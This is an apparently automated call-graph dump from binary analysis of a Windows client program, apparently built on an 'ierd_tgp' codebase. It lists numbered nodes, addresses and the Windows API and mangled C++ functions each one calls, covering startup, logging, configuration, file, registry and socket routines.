46f53b exit 68195 46f541 _exit 68193->68195 68196 46f409 _initterm_e 68194->68196 68200 46f452 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 68194->68200 68197 46f424 68196->68197 68198 46f435 _initterm 68196->68198 68198->68200 68199 46f4a6 __p___argv __p___argc _get_initial_narrow_environment 68213 46ca3b 68199->68213 68200->68199 68203 46f49e _register_thread_local_exe_atexit_callback 68200->68203 68203->68199 68210 46e5d3 68209->68210 68487 46f704 IsProcessorFeaturePresent 68210->68487 68212 46e5df pre_c_initialization 68212->68190 68488 46e4e4 68213->68488 68215 46ca4a GetCommandLineW 68489 40bcb0 68215->68489 68217 46ca6e 68218 46cac7 MessageBoxA 68217->68218 68219 46ca89 68217->68219 68221 46cad6 68218->68221 68697 40bf40 68219->68697 68223 46caf3 ?stamp_point@@YAXPBD ?get_log_instance@base@@YAPAVILogger@1 68221->68223 68224 46cadb strcmp 68221->68224 68226 46cb59 68223->68226 68239 46cb09 68223->68239 68224->68223 68225 46caee ?stamp_init@ 68224->68225 68225->68223 68229 
46cca0 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD OutputDebugStringA 68226->68229 68230 46cb6a ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 68226->68230 68228 46cab9 68232 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 68228->68232 68514 461f63 68229->68514 68493 440ea2 68230->68493 68235 46cac5 68232->68235 68235->68221 68239->68226 68702 43dcb8 memmove 68239->68702 68241 46cbd4 ?get_client_id@util_client_info@ierd_tgp@ 68246 46cbf0 68241->68246 68247 46cbe1 68241->68247 68254 46cc83 68246->68254 68260 420e50 8 API calls 68246->68260 68253 420e50 8 API calls 68247->68253 68253->68246 68263 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68254->68263 68257 46cb4b 68703 43e231 _invalid_parameter_noinfo_noreturn 68257->68703 68266 46cc2d ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@ 68260->68266 68269 46cc8f 68263->68269 68272 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68266->68272 68275 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68269->68275 68280 46cc4c ?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD 68272->68280 68277 46cc9a 68275->68277 68277->68229 68289 46cc77 68280->68289 68290 46cc63 ?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 ?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N 68280->68290 68300 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68289->68300 68290->68289 68300->68254 68486->68193 68487->68212 68488->68215 68490 40bcd2 68489->68490 68490->68490 68742 40bf70 68490->68742 68492 40bcea 68492->68217 68496 440eb2 68493->68496 68497 440ec1 68493->68497 68494 440f01 memchr 68495 440ee5 memcmp 68494->68495 68494->68497 68495->68496 
68495->68497 68496->68494 68496->68497 68498 420e50 68497->68498 68499 420e66 memmove 68498->68499 68504 420e8e 68498->68504 68499->68241 68501 420f6e 68767 40cf50 ?_Xlength_error@std@@YAXPBD 68501->68767 68504->68501 68505 420ed7 68504->68505 68506 420efc 68504->68506 68507 46e3bc std::_Facet_Register 4 API calls 68505->68507 68508 420ee8 68506->68508 68509 46e3bc std::_Facet_Register 4 API calls 68506->68509 68507->68508 68510 420f0d memmove 68508->68510 68511 420f68 _invalid_parameter_noinfo_noreturn 68508->68511 68509->68508 68512 420f4f _Ref_count_obj 68510->68512 68513 420f32 68510->68513 68511->68501 68512->68241 68513->68511 68513->68512 68768 46e476 68514->68768 68516 461f72 GetCommandLineW 68517 40bcb0 8 API calls 68516->68517 68518 461f86 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_log_instance@base@@YAPAVILogger@1 68517->68518 68519 462009 GetCommandLineW CommandLineToArgvW 68518->68519 68529 461fc1 68518->68529 68520 462026 ?get_log_instance@base@@YAPAVILogger@1 68519->68520 68521 462075 68519->68521 68522 46210d 68520->68522 68533 462035 68520->68533 68523 46207f wcscmp 68521->68523 68524 4620b8 ?get_log_instance@base@@YAPAVILogger@1 68521->68524 68527 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68522->68527 68525 462176 ?get_log_instance@base@@YAPAVILogger@1 68523->68525 68526 462097 wcscmp 68523->68526 68524->68522 68524->68533 68525->68522 68538 46213d 68525->68538 68526->68521 68528 462132 ?get_log_instance@base@@YAPAVILogger@1 68526->68528 68530 46211b 68527->68530 68528->68522 68528->68538 68529->68519 68772 453673 91 API calls 68529->68772 68531 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 68530->68531 68534 46212a 68531->68534 68533->68522 68774 43dcb8 memmove 68533->68774 68769 46e420 68534->68769 68535 461ffe 68773 43e231 _invalid_parameter_noinfo_noreturn 68535->68773 68538->68522 68776 43dcb8 memmove 
68538->68776 68541 462102 68775 43e231 _invalid_parameter_noinfo_noreturn 68541->68775 68544 4621c4 68777 43e231 _invalid_parameter_noinfo_noreturn 68544->68777 68698 40bf50 68697->68698 68698->68698 68699 40bf70 SimpleUString::operator= 8 API calls 68698->68699 68700 40bf68 68699->68700 68701 45d5ea 38 API calls 3 library calls 68700->68701 68701->68228 68702->68257 68703->68226 68743 40bf86 memmove 68742->68743 68748 40bfb3 68742->68748 68743->68492 68745 40c0a7 68766 40cf50 ?_Xlength_error@std@@YAXPBD 68745->68766 68748->68745 68749 40bffd 68748->68749 68750 40c02d 68748->68750 68751 46e3bc std::_Facet_Register 4 API calls 68749->68751 68752 40c01b 68750->68752 68758 46e3bc 68750->68758 68751->68752 68754 40c040 memmove 68752->68754 68755 40c0a1 _invalid_parameter_noinfo_noreturn 68752->68755 68756 40c067 68754->68756 68757 40c088 _Ref_count_obj 68754->68757 68755->68745 68756->68755 68756->68757 68757->68492 68759 46e3ce malloc 68758->68759 68760 46e3c1 _callnewh 68759->68760 68761 46e3db 68759->68761 68760->68759 68763 46e3dd std::_Facet_Register 68760->68763 68761->68752 68762 46f6e7 std::_Facet_Register 68764 46f6f5 _CxxThrowException 68762->68764 68763->68762 68765 46f6d8 _CxxThrowException 68763->68765 68765->68762 68768->68516 68778 46e3fa 68769->68778 68771 46e42b 68771->68771 68772->68535 68773->68519 68774->68541 68775->68522 68776->68544 68777->68522 68779 46e405 IsProcessorFeaturePresent 68778->68779 68780 46e403 68778->68780 68782 46e9fe 68779->68782 68780->68771 68785 46e9c2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 68782->68785 68784 46eae1 68784->68771 68785->68784 70582 6bd4885b __EH_prolog3_GS ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 70583 6bd48899 70582->70583 70584 6bd488a8 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 70583->70584 70585 6bd48913 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@ 70584->70585 70586 6bd488c1 
6bd25515 __EH_prolog3_GS 71486 6bd2553c ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 71485->71486 71487 6bd2554e 71485->71487 71486->71487 71496 6bd2500d __EH_prolog3 71487->71496 71489 6bd255ca 71492 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71489->71492 71493 6bd255e1 71489->71493 71490 6bd2558f 71490->71489 71491 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71490->71491 71491->71489 71492->71493 71495 6bd2561a 71493->71495 71501 6bd5f62a 71493->71501 71497 6be22dcc std::_Facet_Register 4 API calls 71496->71497 71498 6bd2502b 71497->71498 71500 6bd25055 71498->71500 71504 6bd24630 71498->71504 71500->71490 71502 6bd5f3ef 71501->71502 71503 6bd5f647 SetWaitableTimer 71502->71503 71503->71495 71507 6bd25922 __EH_prolog3_GS ?current_path@filesystem@ierd_tgp@@YA?AVpath@12 71504->71507 71506 6bd24672 71506->71500 71508 6bd259aa 71507->71508 71547 6bd27457 __EH_prolog3_GS 71508->71547 71510 6bd259ba 71550 6bd25892 __EH_prolog3_GS memset 71510->71550 71512 6bd25a67 71513 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71512->71513 71514 6bd25a73 71513->71514 71515 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71514->71515 71516 6bd25a82 71515->71516 71517 6bd25892 5 API calls 71516->71517 71518 6bd25ac1 71517->71518 71519 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71518->71519 71529 6bd25acd 71519->71529 71520 6bd25bfc ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD CreateEventA 71521 6bd25c4d WaitForSingleObject 71520->71521 71523 6bd25c77 71520->71523 71522 6bd25ca6 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD CreateEventA ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD OpenEventA 71521->71522 71521->71523 71525 6bd25d12 SetEvent CloseHandle 71522->71525 71526 6bd25d20 GetCommandLineW 
71522->71526 71524 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71523->71524 71527 6bd25e53 71524->71527 71525->71526 71528 6bd19a8e 71526->71528 71527->71506 71530 6bd25d32 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD FindWindowA IsWindow 71528->71530 71529->71520 71536 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71529->71536 71546 6bd25bf0 71529->71546 71531 6bd25dd7 WaitForSingleObject 71530->71531 71532 6bd25dbc 71530->71532 71534 6bd25e61 71531->71534 71535 6bd25de8 71531->71535 71532->71531 71533 6bd25dc5 SendMessageA 71532->71533 71533->71531 71540 6bd25e8d _CxxThrowException 71534->71540 71535->71534 71537 6bd25df3 71535->71537 71536->71529 71538 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71537->71538 71539 6bd25dff 71538->71539 71541 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71539->71541 71542 6bd25e0b 71541->71542 71543 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71542->71543 71544 6bd25e26 71543->71544 71545 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71544->71545 71545->71523 71546->71520 71557 6bd260aa __EH_prolog3_GS CryptAcquireContextW 71547->71557 71549 6bd27474 71549->71510 71551 6bd258c3 71550->71551 71552 6bd258c5 ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 71550->71552 71551->71552 71553 6bd258db 71552->71553 71554 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71553->71554 71555 6bd25907 CreateMutexA 71554->71555 71556 6bd2591f 71555->71556 71556->71512 71558 6bd260d0 71557->71558 71559 6bd260d8 GetLastError 71557->71559 71558->71549 71560 6bd260ed 71559->71560 71561 6be2452a 71562 6be24533 ___security_init_cookie 71561->71562 71563 6be24538 dllmain_dispatch 71561->71563 71562->71563 71564 1001c4cc 71569 1001c4df _rand 71564->71569 71565 1001c518 
HeapAlloc 71565->71569 71570 1001c543 _rand 71565->71570 71569->71565 71569->71570 71571 1001c66f 71569->71571 71586 1001d3d8 71569->71586 71594 1001c6d0 LeaveCriticalSection 71569->71594 71572 1001c6c5 EnterCriticalSection 71571->71572 71573 1001c687 71571->71573 71572->71569 71595 1001cd60 20 API calls _wctomb_s 71573->71595 71575 1001c68f 71576 1001c69d 71575->71576 71596 1001b987 7 API calls _rand 71575->71596 71577 1001c66f _wctomb_s 18 API calls 71576->71577 71579 1001c6a5 71577->71579 71580 1001c6b6 71579->71580 71581 1001c6ac InitializeCriticalSection 71579->71581 71597 10017d34 20 API calls 2 library calls 71580->71597 71582 1001c6bb 71581->71582 71598 1001c6d0 LeaveCriticalSection 71582->71598 71585 1001c6c3 71585->71572 71587 1001d40a 71586->71587 71588 1001d4b2 71587->71588 71593 1001d4c6 71587->71593 71599 1001d6e1 71587->71599 71606 1001d792 VirtualAlloc 71588->71606 71590 1001d4b8 71590->71593 71593->71569 71594->71569 71595->71575 71596->71576 71597->71582 71598->71585 71600 1001d724 HeapAlloc 71599->71600 71601 1001d6f4 HeapReAlloc 71599->71601 71603 1001d74a VirtualAlloc 71600->71603 71605 1001d4a9 71600->71605 71602 1001d713 71601->71602 71601->71605 71602->71600 71604 1001d764 HeapFree 71603->71604 71603->71605 71604->71605 71605->71588 71605->71593 71606->71590 71607 6bdcd992 __EH_prolog3_GS 71608 6bdcd9ae ?instance@Application@common@ierd_tgp@@SAPAV123 ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3 ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W GetPrivateProfileIntW 71607->71608 71609 6bdcd9a7 71607->71609 71608->71609 71610 6bda8c15 CreateFileMappingW 71611 6bda8c4d 71610->71611 71612 6bda8c33 MapViewOfFile 71610->71612 71612->71611 71613 6bdba70e __EH_prolog3_GS 71614 6bdba72a SHCreateDirectoryExW 71613->71614 71615 6bdba728 71613->71615 71616 6bdba743 71614->71616 71618 6bdba812 71614->71618 71615->71614 71617 6bd2a76f 27 API calls 71616->71617 71616->71618 71619 6bdba75e 71617->71619 71620 6bdba7a7 
?get_log_instance@base@@YAPAVILogger@1 71619->71620 71621 6bdba7f7 71620->71621 71623 6bdba7b2 71620->71623 71622 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71621->71622 71622->71618 71623->71621 71624 6bd1e945 17 API calls 71623->71624 71624->71621 71625 6bd1c484 __EH_prolog3_catch_GS 71626 6bd1c4a6 71625->71626 71627 6bd1c4cd ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71626->71627 71628 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71627->71628 71630 6bd1c4f0 71628->71630 71629 6bd1c598 ?get_log_instance@base@@YAPAVILogger@1 71631 6bd1c5e2 71629->71631 71632 6bd1c5a3 71629->71632 71630->71629 71632->71631 71633 6bd1e945 17 API calls 71632->71633 71633->71631 71634 6bf6ffa0 connect 71635 6bf70089 71634->71635 71636 6bf6ffda WSAGetLastError 71634->71636 71636->71635 71637 6bf6ffeb 71636->71637 71637->71635 71638 6bf7005e select 71637->71638 71638->71635 71639 6bf70078 71638->71639 71639->71635 71640 6bf7007a __WSAFDIsSet 71639->71640 71640->71635 71641 6bf6fe20 strchr 71642 6bf6fe67 71641->71642 71643 6bf6feaa 71641->71643 71644 6bf6fe77 memmove 71642->71644 71648 6bf6ff0d 71642->71648 71643->71648 71649 6bf6fed6 htons strspn 71643->71649 71645 6bf6fe92 71644->71645 71646 6bf6ff5b 71644->71646 71645->71643 71647 6bf6fe9c atoi 71645->71647 71647->71649 71650 6bf6ff00 71649->71650 71650->71648 71650->71650 71651 6bf6ff3e gethostbyname 71650->71651 71651->71648 71652 6bd5f78d __EH_prolog3_GS ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@ 71653 6bd5f7ce GetFileVersionInfoSizeW 71652->71653 71657 6bd5f848 71652->71657 71654 6bd5f7f4 71653->71654 71653->71657 71655 6bd5f811 GetFileVersionInfoW 71654->71655 71656 6bd5f82f 
VerQueryValueA 71655->71656 71655->71657 71656->71657 71658 6bd1c60a __EH_prolog3_catch_GS 71659 6bd1c629 71658->71659 71660 6bd1c64e ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71659->71660 71661 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71660->71661 71662 6bd1c671 71661->71662 71663 6bd1c68b ?get_log_instance@base@@YAPAVILogger@1 71662->71663 71664 6bd1c696 71663->71664 71665 6bd31608 __EH_prolog3 71666 6bd3162c 71665->71666 71669 6bd31d7b __EH_prolog3_GS 71666->71669 71668 6bd3163e 71670 6bd31d93 71669->71670 71671 6bd31b55 __EH_prolog3_GS 71670->71671 71672 6bd31db1 GetTickCount 71671->71672 71673 6bd31dcd 71672->71673 71674 6bd30f05 52 API calls 71673->71674 71675 6bd31e2f 71673->71675 71674->71675 71675->71668 71676 6bd03b8d 71679 6be24196 71676->71679 71678 6bd03ba5 71680 6be241a2 71679->71680 71681 6be241b2 ?shutdown@Application@common@ierd_tgp@ 71680->71681 71682 6be241cd 71680->71682 71684 6bd8f7a0 __EH_prolog3 71681->71684 71682->71678 71689 6bd8f960 RegOpenKeyExA 71684->71689 71687 6be22dcc std::_Facet_Register 4 API calls 71688 6bd8f7ba 71687->71688 71688->71680 71690 6bd8f7b3 71689->71690 71691 6bd8f991 RegQueryValueExA RegCloseKey 71689->71691 71690->71687 71691->71690 71692 6bd60bb7 71693 6bd60bc5 71692->71693 71696 6bd60b62 71693->71696 71695 6bd60bd9 71697 6bd60b72 CopyFileW 71696->71697 71699 6bd60b96 GetLastError 71697->71699 71700 6bd60b9e 71697->71700 71699->71700 71700->71695 71701 6bd32332 71704 6bd38344 __EH_prolog3 WaitForSingleObject 71701->71704 71703 6bd3233d 71705 6bd38373 71704->71705 71708 6bd3840a 71704->71708 71706 6bd38379 EnterCriticalSection 71705->71706 71707 6bd38390 LeaveCriticalSection 71705->71707 71705->71708 71709 6bd383f4 WaitForSingleObject 71705->71709 71710 6bd383b3 
WaitForSingleObject 71705->71710 71706->71705 71707->71705 71708->71703 71709->71706 71709->71708 71710->71705 71710->71710 71711 6be26000 _beginthreadex 71712 6be26025 71711->71712 71713 6be2602a 71711->71713 71714 6be26048 ResumeThread 71713->71714 71715 6be26041 CloseHandle 71713->71715 71715->71714 71716 6be35d00 71717 6be35d3a 71716->71717 71718 6be35d0a socket 71716->71718 71719 6be35d1b 71718->71719 71720 6be35d28 71718->71720 71722 6be3de60 71720->71722 71723 6be3de96 closesocket 71722->71723 71724 6be3de6e 71722->71724 71723->71717 71724->71723 71725 6be3dea2 71724->71725 71725->71717 71726 401125 GetSystemInfo 71727 6be2420a 71728 6be24215 71727->71728 71729 6be24248 dllmain_crt_process_detach 71727->71729 71730 6be2423a dllmain_crt_process_attach 71728->71730 71731 6be2421a 71728->71731 71729->71731 71730->71731 71732 6bd3b8b9 71733 6bd3b8c3 71732->71733 71734 6bd3b8de 71732->71734 71733->71734 71735 6bd3b8d0 fflush 71733->71735 71735->71734 71736 1001b8ea 71737 1001b906 71736->71737 71739 1001b8fd 71736->71739 71737->71739 71743 1001b92e 71737->71743 71744 1001b811 71737->71744 71740 1001b94e 71739->71740 71741 1001b811 83 API calls 71739->71741 71739->71743 71742 1001b811 83 API calls 71740->71742 71740->71743 71741->71740 71742->71743 71745 1001b8a6 71744->71745 71746 1001b81e GetVersion 71744->71746 71748 1001b8d8 71745->71748 71750 1001b8ac 71745->71750 71773 1001cf93 HeapCreate 71746->71773 71754 1001b871 71748->71754 71790 1001ced8 22 API calls ___free_lc_time 71748->71790 71749 1001b830 71749->71754 71780 1001cdec 28 API calls _rand 71749->71780 71752 1001b8c7 71750->71752 71750->71754 71786 1001845e 23 API calls 71750->71786 71787 1001c478 21 API calls ___free_lc_time 71752->71787 71754->71739 71757 1001b8cc 71788 1001ce40 26 API calls 71757->71788 71758 1001b868 71760 1001b875 GetCommandLineA 71758->71760 71761 1001b86c 71758->71761 71782 10024e85 28 API calls 2 library calls 71760->71782 71781 1001cfcf VirtualFree VirtualFree HeapFree HeapFree 
HeapDestroy 71761->71781 71763 1001b8d1 71789 1001cfcf VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 71763->71789 71765 1001b885 71783 1001c2bc 25 API calls 2 library calls 71765->71783 71768 1001b88f 71784 10024c38 40 API calls 2 library calls 71768->71784 71770 1001b894 71785 10024b7f 39 API calls 3 library calls 71770->71785 71772 1001b899 71772->71754 71774 1001cfb3 71773->71774 71775 1001cfc8 71773->71775 71791 1001d044 HeapAlloc 71774->71791 71775->71749 71777 1001cfb8 71778 1001cfcb 71777->71778 71779 1001cfbc HeapDestroy 71777->71779 71778->71749 71779->71775 71780->71758 71781->71754 71782->71765 71783->71768 71784->71770 71785->71772 71786->71752 71787->71757 71788->71763 71789->71754 71790->71754 71791->71777 71792 6bd8dda8 ?get_client_id@util_client_info@ierd_tgp@ 71793 6bdb2da9 GetModuleHandleA GetProcAddress 71794 6bdb2dd8 71793->71794 71795 6bdb2ddc GetNativeSystemInfo 71793->71795 71795->71794 71796 6be4c310 71797 6be4c319 71796->71797 71798 6be4c368 71797->71798 71799 6be4c32a 71797->71799 71800 6be4c370 71798->71800 71801 6be4c39f realloc 71798->71801 71802 6be4c33a 71799->71802 71803 6be4c354 malloc 71799->71803 71804 6be4c393 free 71800->71804 71805 6be4c382 71800->71805 71804->71802 71806 6bdcd02a __EH_prolog3_GS 71807 6bdcd04c 71806->71807 71809 6bdcd042 71806->71809 71808 6bdcd086 memset GetModuleHandleW GetModuleFileNameW 71807->71808 71810 6bdcd0eb 71808->71810 71810->71809 71811 6bdcd18f PathFileExistsW 71810->71811 71811->71809 71812 6bdcd1b2 71811->71812 71813 6bdcd203 ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71812->71813 71815 6bdcd2e3 71812->71815 71814 6bdcd2c8 71813->71814 71818 6bdcd22f 71813->71818 71817 6bdcd2d7 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71814->71817 71816 6bdcd2fd 
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71815->71816 71816->71809 71817->71815 71819 6bdcd2b9 71818->71819 71820 6bdcd291 atoi 71818->71820 71821 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71819->71821 71820->71819 71821->71814 71822 6bd9182f __EH_prolog3 71823 6be22dcc std::_Facet_Register 4 API calls 71822->71823 71824 6bd9184b 71823->71824 71825 43ef34 71828 43e902 71825->71828 71829 43e911 __EH_prolog3_GS 71828->71829 71830 43e926 PathFileExistsW 71829->71830 71831 43e937 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71830->71831 71832 43ea53 71830->71832 71834 43e963 SHCreateDirectoryExW 71831->71834 71835 43e961 71831->71835 71833 40f180 16 API calls 71832->71833 71836 43ea6c PathFileExistsW 71833->71836 71837 43e9e4 ?get_log_instance@base@@YAPAVILogger@1 71834->71837 71838 43e974 71834->71838 71835->71834 71839 43ea8f CreateFileW 71836->71839 71840 43ea47 71837->71840 71852 43e9ef 71837->71852 71838->71837 71841 43e97c ?get_log_instance@base@@YAPAVILogger@1 71838->71841 71844 43eb33 memset 71839->71844 71845 43eac6 ?get_log_instance@base@@YAPAVILogger@1 71839->71845 71842 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 71840->71842 71841->71840 71855 43e98b 71841->71855 71842->71832 71846 43eb4b ReadFile 71844->71846 71847 43ec1e ?get_log_instance@base@@YAPAVILogger@1 71844->71847 71848 43ead5 71845->71848 71886 43eb2e 71845->71886 71850 43ebbe ?get_log_instance@base@@YAPAVILogger@1 71846->71850 71851 43eb6c ?get_log_instance@base@@YAPAVILogger@1 71846->71851 71853 43ec9a 71847->71853 71864 43ec29 71847->71864 71871 43eb02 GetLastError 71848->71871 71848->71886 71849 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 71854 43ed9a 71849->71854 71850->71847 71866 43ebc9 71850->71866 71851->71847 71879 43eb7b 71851->71879 71852->71840 71862 43f4bb 21 API calls 71852->71862 71856 43eca8 GetLocalTime WriteFile 71853->71856 71897 43eda0 
41 API calls 3 library calls 71853->71897 71857 46e420 5 API calls 71854->71857 71855->71840 71858 43e9b8 GetLastError 71855->71858 71860 43ecd3 ?get_log_instance@base@@YAPAVILogger@1 71856->71860 71861 43ed25 ?get_log_instance@base@@YAPAVILogger@1 71856->71861 71865 43ed9f 71857->71865 71869 43f4bb 21 API calls 71858->71869 71868 43ed87 CloseHandle 71860->71868 71870 43ece2 71860->71870 71867 43ed30 71861->71867 71861->71868 71863 43e9df 71862->71863 71893 43e231 _invalid_parameter_noinfo_noreturn 71863->71893 71864->71853 71874 43f4bb 21 API calls 71864->71874 71866->71847 71876 43ebf2 GetLastError 71866->71876 71867->71868 71877 43ed3f 71867->71877 71868->71886 71869->71863 71870->71868 71878 43ecf4 71870->71878 71873 43f4bb 21 API calls 71871->71873 71875 43eb1c 71873->71875 71881 43ec88 71874->71881 71894 43e231 _invalid_parameter_noinfo_noreturn 71875->71894 71883 43f4bb 21 API calls 71876->71883 71887 43ed5c GetLastError 71877->71887 71888 43f4bb 21 API calls 71878->71888 71879->71847 71880 43f4bb 21 API calls 71879->71880 71884 43ebb9 71880->71884 71896 43e231 _invalid_parameter_noinfo_noreturn 71881->71896 71883->71884 71895 43e231 _invalid_parameter_noinfo_noreturn 71884->71895 71886->71849 71889 43f4bb 21 API calls 71887->71889 71890 43ed20 71888->71890 71889->71890 71898 43e231 _invalid_parameter_noinfo_noreturn 71890->71898 71893->71840 71894->71886 71895->71847 71896->71853 71897->71856 71898->71868 71899 6bd23a28 _beginthreadex 71900 6bd23a67 71899->71900 71901 6bd61bad 71902 6bd16b70 71901->71902 71903 6bd61bbb ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@ 71902->71903 71904 6bd571ae __EH_prolog3_GS 71905 6bd19a0e 71904->71905 71906 6bd571c7 ?is_profile_on@common@ierd_tgp@ 71905->71906 71907 6bd571d3 71906->71907 71908 6bd57219 71906->71908 71910 6bd571f7 
?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71907->71910 71909 6bd57234 71908->71909 71911 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71908->71911 71912 6bd57242 ?enable_profile_on@common@ierd_tgp@@YAX_N 71909->71912 71913 6bd5724c 71909->71913 71910->71908 71911->71909 71912->71913 71914 6bd874a3 __EH_prolog3_catch_GS 71915 6bd874eb 71914->71915 71917 6bd877fb 71914->71917 71916 6bd87536 GetAdaptersInfo 71915->71916 71926 6bd874f4 71915->71926 71918 6bd87568 GetAdaptersInfo 71916->71918 71919 6bd87554 71916->71919 71917->71915 71920 6bd8783a __Init_thread_footer 71917->71920 71921 6bd87582 71918->71921 71918->71926 71919->71918 71920->71915 71922 6bd87609 71921->71922 71923 6bd87592 ?get_log_instance@base@@YAPAVILogger@1 71921->71923 71924 6bd0f200 15 API calls 71922->71924 71925 6bd8759d 71923->71925 71923->71926 71930 6bd87643 71924->71930 71925->71926 71927 6bd1e945 17 API calls 71925->71927 71927->71926 71928 6bd87726 71929 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71928->71929 71929->71926 71930->71928 71931 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71930->71931 71931->71928 71932 6bd398ae __EH_prolog3_GS 71933 6bd398da 71932->71933 71936 6bd3c3ab __EH_prolog3 71933->71936 71935 6bd398fb 71937 6bd3c3c4 71936->71937 71937->71935 71938 6bd4702b __EH_prolog3_catch_GS 71939 6bd44339 71938->71939 71940 6bd4705c ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1 71939->71940 71941 6bd470d1 ?get_file_path_by_key@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 71940->71941 71944 6bd470a6 71940->71944 71943 6bd47114 71941->71943 71941->71944 71942 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71945 6bd470b2 71942->71945 
